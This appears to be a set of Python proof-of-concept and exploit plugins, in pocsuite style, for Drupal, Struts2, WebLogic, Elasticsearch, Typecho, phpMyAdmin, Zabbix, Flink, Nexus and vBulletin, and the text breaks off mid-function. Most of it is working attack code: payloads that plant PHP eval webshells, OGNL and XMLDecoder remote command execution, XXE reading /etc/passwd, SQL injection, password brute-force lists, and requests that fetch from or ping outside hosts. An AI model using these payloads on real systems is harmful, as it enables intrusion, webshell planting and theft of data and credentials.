def _attack(self):
    """Attack mode: posts a crafted AJAX registration form, then checks for a file named 1.php.

    The form's mail field carries a post_render callback whose markup value is `cmd`;
    a second POST to /1.php looks for "uid" in the body to decide success.
    `req` and `proxies` are module-level names not visible in this block.
    Returns self.parse_attack(result), where result holds a ShellInfo entry only on success.
    """
    result = {}
    vul_url = '%s/user/register?element_parents=account/mail/%%23value&ajax_form=1&_wrapper_format=drupal_ajax' % self.url
    # the value written on the target is decoded by tr before being tee'd into 1.php
    cmd = "echo ':=nfn ct_j($]NMQRYa[)9' | tr '.-x' '0-z'|tee 1.php"
    payload = {
        "form_id": "user_register_form",
        "_drupal_ajax": "1",
        "mail[#post_render][]": "exec",
        "mail[#type]": "markup",
        "mail[#markup]": cmd
    }
    # if not self._verify(verify=False):
    #     return self.parse_attack(result)
    # print urllib.urlencode(payload)
    response = req.post(vul_url, data=payload, proxies=proxies)
    # response = req.post(vul_url, data=payload)
    # print response.content
    if response.status_code == 200:
        # the request to /1.php is the only success check; the first response body is not inspected
        res = req.post(url=self.url + "/1.php", data={"c": "system(\"id\");"}, proxies=proxies)
        if "uid" in res.content:
            # print res.content
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/1.php"
            result['ShellInfo']['content'] = '<?php eval($_POST[c]);'
    return self.parse_attack(result)
def _verify(self):
    """Verify mode: uploads a marker PHP file through the ajax upload endpoint and requests it back.

    A temporary s.php is written to the current working directory, posted as the
    `filename` field, and removed locally; the path the server echoes back is then
    requested and the marker string looked for. The uploaded file removes itself
    on first execution (unlink(__FILE__)).
    Returns self.parse_output(result); VerifyInfo is set only when the marker is served.
    """
    result = {}
    vulurl = urlparse.urljoin(self.url, 'index.php?do=ajax&view=upload&file_type=big&filename=filename')
    shell = "Ra<?php echo pocpocpocpoctesttesttest;unlink(__FILE__);?>"
    # create the file locally
    f = open('s.php', 'wb+')
    f.write(shell)
    f.flush()
    f.close()
    # upload the file
    f = open('s.php', 'rb')
    files = [('filename', ('php.php', f, 'jpg'))]
    resp = req.post(vulurl, files=files)
    # delete the local file just created
    # NOTE(review): if req.post raises, s.php is left behind in the working directory
    f.close()
    os.remove('s.php')
    # match the stored path, request it to confirm the upload, and let the file delete itself
    match = re.findall(r'"(data\\\/uploads\\\/.*?\.php)"', resp.content)
    if match:
        url = urlparse.urljoin(self.url, '/' + match[0].replace('\\', ''))
        resp = req.post(url)
        if resp.status_code == 200 and 'pocpocpocpoctesttesttest' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
    return self.parse_output(result)
def _verify(self):
    '''verify mode

    Indexes one document on the target, then issues a _search whose
    script_fields entry runs `cmd`; the decoded JSON response is attached to
    the result. parse_target supplies address/port/schema, defaulting the
    port to 9200. Returns self.parse_output(result).
    '''
    result = {}
    cmd = "cat /etc/passwd"
    target = self.parse_target(self.target, 9200)
    target_ip = target['address']
    target_port = target['port']
    schema = target['schema']
    headers = {
        'Host': '{}:{}'.format(target_ip, target_port),
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Connection': 'close',
        'Content-Type': 'application/json',
        # NOTE(review): hard-coded Content-Length; presumably the HTTP client
        # recomputes it from the body, otherwise it will not match -- confirm
        'Content-Length': '25',
    }
    # insert a document
    payload = {"name": "phithon"}
    req.post(url='{}://{}:{}/website/blog/'.format(schema, target_ip, target_port), headers=headers, data=json.dumps(payload))
    # query
    headers.update({"Content-Length": '343'})
    payload = {
        "size": 1,
        "query": {
            "filtered": {
                "query": {
                    "match_all": {}
                }
            }
        },
        "script_fields": {
            "command": {
                "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"" + cmd + "\").getInputStream()).useDelimiter(\"\\\\A\").next();"
            }
        }
    }
    resp = req.post(url='{}://{}:{}/_search?pretty'.format(schema, target_ip, target_port), headers=headers, data=json.dumps(payload))
    # truthiness of resp is whatever the client's response object defines -- not checked here
    if resp:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = '{}://{}:{}/_search?pretty'.format(schema, target_ip, target_port)
        result['VerifyInfo']['Command'] = cmd
        result['VerifyInfo']['Result'] = json.loads(resp.text)
    return self.parse_output(result)
def _verify(self):
    """Verify mode: submits a member registration whose info[content] holds an <img> tag
    and checks whether the server stores it under a .php name.

    Throwaway credentials come from randomStr. The "******" literals appear to be
    redactions on this page rather than the original format strings -- verify against
    the upstream file. Returns self.parse_attack(result).
    """
    result = {}
    url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
    username = randomStr(6)
    password = randomStr(6, '1234567890')
    data = {
        "siteid": "1",
        "modelid": "1",
        "username": "******" % (username),
        "password": "******" % (password),
        "email": "*****@*****.**" % (username),
        "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
        "dosubmit": "1",
        "protocol": "",
    }
    # three groups: path prefix, dated directory, numeric file name
    match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
    resp = req.post(url, data=data)
    shell = re.findall(match, resp.text)
    # NOTE(review): shell[0] is indexed before the emptiness check below, so a
    # non-matching response raises IndexError instead of reporting not vulnerable
    shellinfo = ''.join(shell[0]) + ".php"
    if shell:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        shell_resp = req.get(shellinfo)
        if shell_resp.status_code == 200:
            result['VerifyInfo']['webshell'] = shellinfo
    return self.parse_attack(result)
def exec_command(site, command):
    """Run `command` through the uploaded jar on the /jars API of `site` and return its output.

    The jar is looked up with check_jar_exsits and uploaded via upload_execute_jar
    when absent; delete_exists_jar removes it after the run.
    Returns the text between |@| markers minus its last two characters,
    "[result is blank]" when that text is empty, "[execute timeout]" on a read
    timeout, and False when no jar could be found/uploaded or the response had
    no markers. Other exceptions propagate. upload_jar_name, default_headers-style
    globals and `req` are defined outside this block.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36',
        'Content-Type': 'application/json;charset=utf-8',
    }
    jar_hash_name = check_jar_exsits(site, upload_jar_name)
    # NOTE(review): `command` is interpolated into the JSON body and the query string
    # without any escaping, so quotes in it break the request
    data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command
    if jar_hash_name:
        execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format(site, jar_hash_name, command)
    else:
        upload_execute_jar(site, upload_jar_name)
        jar_hash_name = check_jar_exsits(site, upload_jar_name)
        if jar_hash_name:
            execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format(site, jar_hash_name, command)
        else:
            return False
    try:
        r1 = req.post(execute_cmd_url, headers=headers, data=data, verify=False, timeout=20)
        # the jar wraps its output in |@| ... |@|
        match = re.findall('\|@\|(.*?)\|@\|', r1.text)
        delete_exists_jar(site, jar_hash_name)
        if match:
            # the last two characters are dropped -- presumably a trailing separator; confirm against the jar
            return match[0][:-2] if match[0][:-2] else "[result is blank]"
    except req.exceptions.ReadTimeout as e:
        return "[execute timeout]"
    return False
def _verify(self, verify=True):
    """Verify mode: tries a fixed username/password list against a phpMyAdmin login form.

    Looks for the login page at self.url (and at /phpmyadmin/index.php when the
    URL does not mention phpmyadmin), posts each pair, and treats any fragment
    from flag_list in a 200 response as a successful login. Returns
    self.parse_attack(result) on the first hit; otherwise returns None.
    The `verify` parameter is unused.
    """
    result = {}
    url_list = [self.url]
    # fragments of the post-login page
    flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">', 'class=\"disableAjax\" title=']
    if "phpmyadmin" not in self.url.lower():
        url_list.append(self.url + "/phpmyadmin/index.php")
    username_list = ['admin', 'root', 'test']
    password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf', 'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$', 'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.', '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx']
    for url in url_list:
        try:
            f_res = req.get(url, timeout=5)
            # only proceed when the page looks like a phpMyAdmin login form
            if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content:
                for username in username_list:
                    for password in password_list:
                        payload = {'pma_username': username, 'pma_password': password}
                        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
                        res = req.post(url, headers=headers, data=payload, timeout=5)
                        for flag in flag_list:
                            if flag in res.content and res.status_code == 200:
                                result['VerifyInfo'] = {}
                                result['VerifyInfo']['url'] = url
                                result['VerifyInfo']['status_code'] = res.status_code
                                result['VerifyInfo']['username'] = username
                                result['VerifyInfo']['password'] = password
                                result['username'] = username
                                result['password'] = password
                                return self.parse_attack(result)
        except Exception as e:
            # NOTE(review): re-raising here means one timeout aborts the whole check;
            # the try/except adds nothing
            raise e
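def login(self):
    """Authenticate against the target's JSON-RPC endpoint and keep the reply in self.auth.

    Credentials are taken from self.params when it is set -- a string holding a
    dict literal with 'username' and 'password' keys -- otherwise the built-in
    defaults are used.

    Returns:
        True when the POST completed and its JSON body was stored in self.auth,
        False when the request or the JSON decoding failed.

    Raises:
        ValueError: self.params is set but is not a plain Python literal.
        KeyError: the literal lacks 'username' or 'password'.
    """
    import ast

    if self.params:
        # self.params is operator-supplied text; literal_eval only accepts
        # constants/containers, unlike eval() which executed arbitrary code.
        user_info = ast.literal_eval(self.params)
        uname = user_info['username']
        passwd = user_info['password']
    else:
        uname = 'Admin'
        passwd = 'zabbix'
    payload = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {
            'user': uname,
            'password': passwd,
        },
        "auth": None,
        "id": 0,
    }
    headers = {
        'content-type': 'application/json',
    }
    try:
        auth = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=(headers))
        self.auth = auth.json()
        return True
    except Exception:
        # best-effort login: any transport or decoding failure is reported as False
        return False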
def _verify(self):
    """Verify mode: sends an OGNL expression as the Content-Type header and looks for the echoed marker.

    The expression runs `command` on the target (an echo of a fixed token); the
    token appearing in the response body is the only success check.
    The "[email protected]" fragment looks like a rendering artefact of this page
    rather than part of the original expression -- confirm against the upstream file.
    Returns self.parse_output(result).
    """
    result = {}
    command = "echo 89aifh76ftq4fu38yfq498yf"
    payload = "Content-Type:%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % command
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    # the whole expression travels in the Content-Type header, not the body
    headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
    response = req.post(self.url, headers=headers)
    if "89aifh76ftq4fu38yfq498yf" in response.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = response.url
    return self.parse_output(result)
def weblogic_rce(target):
    """Post the body from payload_command() to the wls-wsat endpoint of `target` and classify the status.

    Returns verify_result(target) on HTTP 500, (False, '404 no vulnerability') on 404,
    (False, '<code> something went wrong') for other codes, (False, 'timeout') on a
    read timeout and (False, str(ex)) for any other exception.
    payload_command and verify_result are defined outside this block.
    """
    url = '{}/wls-wsat/CoordinatorPortType'.format(target)
    # content-type must be text/xml
    payload_header = {
        'content-type': 'text/xml',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'
    }
    try:
        r = req.post(url, payload_command(), headers=payload_header, verify=False)
        # a 500 is taken to mean the body was deserialized; verify_result does the real check
        if r.status_code == 500:
            return verify_result(target)
        elif r.status_code == 404:
            return (False, '404 no vulnerability')
        else:
            return (False, '{} something went wrong'.format(r.status_code))
    except req.exceptions.ReadTimeout:
        return (False, 'timeout')
    except Exception, ex:
        # raise
        return (False, str(ex))
def strust2_033(self, url):
    """Check `url` for S2-033 (CVE-2016-3087) by appending an OGNL expression to the path.

    Posts a probe whose command echoes "vulnerable"; when that marker comes back,
    posts a second expression running whoami and records the target if the reply
    is not simply the request echoed. Prints raw responses to stdout and swallows
    every exception after printing it. `result` is populated but never returned.
    """
    from urlparse import urljoin
    result = {}
    # S2-033 POC
    # Author: CF_HB
    # Date: 2016-06-06
    # Vulnerability id: CVE-2016-3087 (S2-033)
    # Details: http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/
    # NOTE(review): the "[email protected]" fragments look like a rendering artefact of this page
    s2033_poc = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=echo vulnerable"
    try:
        poc_url = urljoin(url, s2033_poc)
        # print poc_url
        s = req.session()
        res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
        print '033poc###################################'
        print res.content
        if res.status_code == 200 and "vulnerable" in res.content:
            # print "{url} is vulnerable S2-033.".format(url=url)
            exp = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami"
            target = urljoin(url, exp)
            res = req.post(target, timeout=3, allow_redirects=False, verify=False)
            restext = res.text.encode('utf-8').strip().strip('\x00')
            print '033exp###########################'
            print restext
            # a reply that still contains the query string is treated as "not executed"
            if 'command=whoami' not in restext:
                result['VerifyInfo'] = {}
                result['name'] = 'strust2_033'
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = poc_url
        else:
            # print "{url} is not vulnerable..".format(url=url)
            pass
    except Exception, e:
        print e
def _attack(self):
    """Attack mode: posts a base64 blob as __typecho_config to install.php and checks for webshell.php.

    The POST response itself is not inspected; success is decided solely by a
    200 on GET /webshell.php, so the blob presumably causes that file to be
    written -- its contents are not readable from this block.
    Returns self.save_output(result).
    """
    # define the returned result
    result = {}
    header = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
        "Referer": self.url
    }
    payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCd3ZWJzaGVsbC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ=="
    data = {
        "__typecho_config": payload
    }
    # get the vulnerable url
    # NOTE(review): this assignment is immediately overwritten below
    vul_url = '%s' % self.url
    # get the processed url
    vul_url = self.url + "/install.php?finish=a"
    res = req.post(vul_url, headers=header, data=data)
    status = req.get(self.url + "/webshell.php").status_code
    if status == 200:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url + "/webshell.php" + "--->Password:P0"
        result['VerifyInfo']['Payload'] = data
    return self.save_output(result)
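def login(self):
    """Authenticate against the target's JSON-RPC endpoint and keep the reply in self.auth.

    Credentials are taken from self.params when it is set -- a string holding a
    dict literal with 'username' and 'password' keys -- otherwise the built-in
    defaults are used.

    Returns:
        True when the POST completed and its JSON body was stored in self.auth,
        False when the request or the JSON decoding failed.

    Raises:
        ValueError: self.params is set but is not a plain Python literal.
        KeyError: the literal lacks 'username' or 'password'.
    """
    import ast

    if self.params:
        # self.params is operator-supplied text; literal_eval only accepts
        # constants/containers, unlike eval() which executed arbitrary code.
        user_info = ast.literal_eval(self.params)
        uname = user_info['username']
        passwd = user_info['password']
    else:
        uname = 'Admin'
        passwd = 'zabbix'
    payload = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {
            'user': uname,
            'password': passwd,
        },
        "auth": None,
        "id": 0,
    }
    headers = {
        'content-type': 'application/json',
    }
    try:
        auth = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=(headers))
        self.auth = auth.json()
        return True
    except Exception:
        # best-effort login: any transport or decoding failure is reported as False
        return False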
def upload_webshell(host, uri):
    """Upload a marker file through the ws_utc keystore form and check it is served back.

    First points the work directory at get_new_work_path(host) via set_new_upload_path,
    posts a multipart form with a .jsp file name, extracts the last <id> from the
    response and requests /ws_utc/css/config/keystore/<id>_test.jsp.
    Returns True when the marker text is served, False otherwise; prints the path on success.
    set_new_upload_path, get_new_work_path and `req` are defined outside this block.
    """
    set_new_upload_path(host, get_new_work_path(host))
    upload_content = "POC test"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
    }
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": "test",
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp", upload_content)
    }
    # `headers` is not sent with this POST, only with the GET below
    resp = req.post(host + uri, files=files)
    response = resp.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_test.jsp"
        if upload_content in req.get(shell_path, headers=headers).content:
            print shell_path
            return True
        else:
            return False
    else:
        return False
def _netreq(self, target_url, username, password):
    """Post one username/password pair to a phpMyAdmin login form and report whether it logged in.

    Fetches the form to read set_session/token and cookies, posts the credentials,
    and looks for post-login page fragments in flag_list. The attempt is repeated
    up to 10 times (fresh token each time) before giving up.
    Returns a dict with a VerifyInfo entry on success, otherwise an empty dict.
    """
    result = {}
    flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">', 'class="disableAjax" title=']
    for _ in range(10):
        res = req.get(url=target_url)
        # NOTE(review): [0] raises IndexError when the page has no set_session/token field
        set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0]
        token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0]
        # re-send the cookies the form handed out, as a single Cookie header
        cookie = ''
        for x, y in res.cookies.get_dict().items():
            cookie = cookie + "{}={};".format(x, y)
        header = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": cookie
        }
        payload = {
            "set_session": set_session,
            "pma_username": username,
            "pma_password": password,
            "server": "1",
            "target": "index.php",
            "token": token
        }
        payload = urllib.urlencode(payload)
        response = req.post(url=target_url, data=payload, headers=header)
        for flag in flag_list:
            if flag in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['Payload'] = payload
                return result
    return result
def _verify(self):
    """Verify mode: after login, rewrites script 1 to run `cmd` and executes it on host 10084.

    Two JSON-RPC calls (script.update, then script.execute) are made with the auth
    token from self.login(); the command output is recorded when the response
    reports 'success'. scriptid and hostid are hard-coded.
    Returns self.parse_output(result).
    """
    result = {}
    if self.login():
        cmd = 'whoami'
        hostid = '10084'
        payload = {
            "jsonrpc": "2.0",
            "method": "script.update",
            "params": {
                "scriptid": "1",
                "command": "" + cmd + ""
            },
            "auth": self.auth['result'],
            "id": 0,
        }
        headers = {
            'content-type': 'application/json',
        }
        # the update response is not checked
        cmd_upd = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=headers)
        payload = {
            "jsonrpc": "2.0",
            "method": "script.execute",
            "params": {
                "scriptid": "1",
                "hostid": hostid
            },
            "auth": self.auth['result'],
            "id": 0,
        }
        cmd_exe = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=headers)
        cmd_exe = cmd_exe.json()
        # NOTE(review): a JSON-RPC error reply has no "result" key and raises KeyError here
        if cmd_exe["result"]["response"] == 'success':
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Url'] = self.url
            result['VerifyInfo']['Cmd'] = cmd
            result['VerifyInfo']['Value'] = cmd_exe['result']['value']
    return self.parse_output(result)
def _verify(self):
    '''verify mode

    Posts a WorkContext SOAP header to /wls-wsat/CoordinatorPortType whose
    XMLDecoder body defines a class from hex bytes (redacted on this page as a
    placeholder) and runs whoami. A 200 with a short (<20 byte) body is taken as
    the command output and stored as Username. Returns self.parse_output(result).
    '''
    result = {}
    data = '''<?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="weblogic.utils.Hex" method="fromHexString" id="cls"><string>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</string> </void> <void class="org.mozilla.classfile.DefiningClassLoader"> <void method="defineClass"> <string>com.supeream.exploits.XmlExp</string> <object idref="cls"></object> <void method="newInstance"> <void method="say" id="proc"> <string>whoami</string> </void> </void> </void> </void> <void class="java.lang.Thread" method="currentThread"> <void method="getCurrentWork"> <void method="getResponse"> <void method="getServletOutputStream"> <void method="writeStream"> <object idref="proc"></object> </void> <void method="flush"/> </void> <void method="getWriter"><void method="write"><string></string></void></void> </void> </void> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>'''
    headers = {
        # NOTE(review): the value already starts with "User-Agent: ", so the header is sent doubled
        'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Upgrade-Insecure-Requests': '1',
        'Content-Type': 'text/xml',
        'Content-Length': '{}'.format(len(data))
    }
    resp = req.post(urljoin(self.url, '/wls-wsat/CoordinatorPortType'), headers=headers, data=data)
    # a short body is the heuristic for "command output rather than an error page"
    if resp.status_code == 200 and resp.content and len(resp.content) < 20:
        result['VerifyInfo'] = "success"
        result['Username'] = resp.content.strip()
    return self.parse_output(result)
def _verify(self):
    """Verify mode: posts an XML body with an external entity reading /etc/passwd and looks for the root line.

    Returns self.parse_output(result); VerifyInfo is "success" only when
    "x:0:0:root" appears in the response text.
    """
    result = {}
    target = urljoin(self.url, "/simplexml_load_string.php")
    http_body = '''<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root>'''
    resp = req.post(target, data=http_body)
    if "x:0:0:root" in resp.text:
        result['VerifyInfo'] = "success"
    return self.parse_output(result)
def upload_execute_jar(site, upload_jar_name):
    """Upload the embedded jar (base64, redacted on this page) to {site}/jars/upload.

    Returns True when the POST did not raise, False on any exception; the HTTP
    status of the upload is not checked. default_headers and `req` are module-level.
    """
    upload_jar_url = "{}/jars/upload".format(site)
    file_content = base64.b64decode(
        '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'
    )
    files = {
        'jarfile': (upload_jar_name, cStringIO.StringIO(file_content), 'application/octet-stream')
    }
    try:
        req.post(upload_jar_url, headers=default_headers, files=files, timeout=30, verify=False)
    except Exception as e:
        return False
    return True
def _verify(self):
    """Verify mode: after login, rewrites script 1 to run `cmd` and executes it on host 10084.

    Two JSON-RPC calls (script.update, then script.execute) are made with the auth
    token from self.login(); the command output is recorded when the response
    reports 'success'. scriptid and hostid are hard-coded.
    Returns self.parse_output(result).
    """
    result = {}
    if self.login():
        cmd = 'whoami'
        hostid = '10084'
        payload = {
            "jsonrpc": "2.0",
            "method": "script.update",
            "params": {
                "scriptid": "1",
                "command": "" + cmd + ""
            },
            "auth": self.auth['result'],
            "id": 0,
        }
        headers = {
            'content-type': 'application/json',
        }
        # the update response is not checked
        cmd_upd = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=headers)
        payload = {
            "jsonrpc": "2.0",
            "method": "script.execute",
            "params": {
                "scriptid": "1",
                "hostid": hostid
            },
            "auth": self.auth['result'],
            "id": 0,
        }
        cmd_exe = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=headers)
        cmd_exe = cmd_exe.json()
        # NOTE(review): a JSON-RPC error reply has no "result" key and raises KeyError here
        if cmd_exe["result"]["response"] == 'success':
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Url'] = self.url
            result['VerifyInfo']['Cmd'] = cmd
            result['VerifyInfo']['Value'] = cmd_exe['result']['value']
    return self.parse_output(result)
def _verify(self):
    """Verify mode: sends a JEXL expression through /service/extdirect and waits for a DNS callback.

    The expression pings {BANNER}.{DOMAIN}; after a 2 s pause, dnslog_sucess(CEYE_URL)
    decides whether the lookup was observed. The HTTP response is ignored and any
    request error is printed. Returns self.save_output(result).
    """
    # call the fingerprint method
    result = {}
    vul_url = self.url
    target_url = vul_url + "/service/extdirect"
    headers = {'Referer': ''}
    import json
    j = {
        "action": "coreui_Component",
        "method": "previewAssets",
        "data": [{
            "page": 1,
            "start": 0,
            "limit": 25,
            "filter": [{
                "property": "repositoryName",
                "value": "*"
            }, {
                "property": "expression",
                "value": "1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)
            }, {
                "property": "type",
                "value": "jexl"
            }]
        }],
        "type": "rpc",
        "tid": 4
    }
    try:
        # 1 s timeout: the request is expected to hang while the ping runs
        resp = req.post(target_url, json=j, headers=headers, timeout=1)
    except Exception as e:
        print e
    import time
    time.sleep(2)  # sleep 2 s so the DNS log has time to record the lookup
    if self.dnslog_sucess(self.CEYE_URL):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = target_url
        return self.save_output(result)
    return self.save_output(result)
def _verify(self):
    """Verify mode: asks the widget_php route to evaluate `expr a + b` with two random ints.

    The target is marked vulnerable when the response text contains the sum --
    a side-effect-free check whose expected value cannot be guessed by a static page.
    Returns self.parse_attack(result).
    """
    result = {}
    target = self.url
    params = {"routestring": "ajax/render/widget_php"}
    random_int1 = random.randint(0, 200000)
    random_int2 = random.randint(0, 200000)
    params["widgetConfig[code]"] = "echo shell_exec('expr {} + {}'); exit;".format(random_int1, random_int2)
    r = req.post(target, data=params)
    if r.status_code == 200 and str(random_int1 + random_int2) in r.text:
        result['result'] = {}
        result['result']['text'] = r.text
    return self.parse_attack(result)
def _verify(self):
    """Verify mode: sends an error-based SQL probe in hotelId and looks for the ~~~ delimited marker.

    The probe makes the database error message carry MD5(3.14) between ~~~ markers;
    any such match is recorded. Returns self.parse_output(result).
    """
    result = {}
    vulurl = "%s/?m=hotel.getHotelInfo" % self.url
    payload = {"hotelId": "11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"}
    resp = req.post(vulurl, data=payload, timeout=15)
    # 0x7e7e7e is "~~~"; the marker is matched across lines, case-insensitively
    re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S | re.I)
    if re_result:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vulurl
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
def _verify(self):
    '''verify mode

    Uploads a random-named file with random content through the CKEditor
    filemanager upload.cfm (hand-built multipart body, port 8500 assumed when
    none is given) and fetches it back from uploadedFiles/. Returns
    self.parse_output(result); VerifyInfo is set when the content is served.
    '''
    result = {}
    if urlparse(self.url).port is None:
        self.url = self.url + ":8500"
    url = urljoin(self.url, '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm')
    filename = randomStr(6)
    content = randomStr(12)
    data = "-----------------------------24464570528145\r\n"
